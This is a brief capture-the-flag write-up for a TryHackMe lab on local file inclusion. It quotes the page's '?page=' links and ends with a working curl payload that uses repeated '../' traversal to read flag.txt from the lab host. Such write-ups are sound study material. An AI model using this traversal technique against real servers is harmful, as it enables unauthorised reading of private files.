https://tryhackme.com/room/lofi

Keyword: LFI, File Inclusion

Look at source code of challenge, I saw path to other PHP page:

<!-- Categories Widget -->
<div class="card my-4">
    <h5 class="card-header">Discography</h5>
    <div class="card-body">
        <div class="row">
            <div class="col-lg-6">
                <ul class="list-unstyled mb-0">
                    <li><a href="/?page=relax.php">Relax</a></li>
                    <li><a href="/?page=sleep.php">Sleep</a></li>
										<li><a href="/?page=chill.php">Chill</a></li>    
										<li><a href="/?page=coffee.php">Coffee</a></li>
										<li><a href="/?page=vibe.php">Vibe</a></li>
										<li><a href="/?page=game.php">Game</a></li>
                </ul>
            </div>
        </div>
    </div>
</div>

So my thought is very very simple, how about cd to parent folder (../), to parent folder,… and so on to root (don’t worry about how much ../, root folder has parent folder is, of course, root folder)

So my payload is:

curl 10.10.253.144/?page=../../../../../../flag.txt

Just that.